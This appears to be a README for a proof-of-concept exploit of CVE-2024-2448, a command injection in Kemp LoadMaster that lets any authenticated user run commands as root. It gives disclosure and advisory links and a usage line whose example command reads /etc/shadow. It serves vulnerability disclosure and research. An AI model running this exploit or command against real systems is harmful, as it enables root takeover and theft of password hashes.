Description: CVE-2024-2448 allows an authenticated user to execute commands as root on LoadMaster load balancers.
Versions Affected: LoadMaster 7.2.59.2
Version Fixed: See Vendor Advisory
Researcher: Dave Yesland (https://twitter.com/daveysec)
Disclosure Link: https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/
NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-2448
Vendor Advisory: https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449
The script exploits a command injection in LoadMaster in which user input is executed by an eval statement. The injection requires authentication, but it works with any permission settings on the account.
Usage: python3 CVE-2024-2448.py --url 'https://LM_HOST:8443' --cookie 'AUTH_COOKIE' --cmd 'cat /etc/shadow'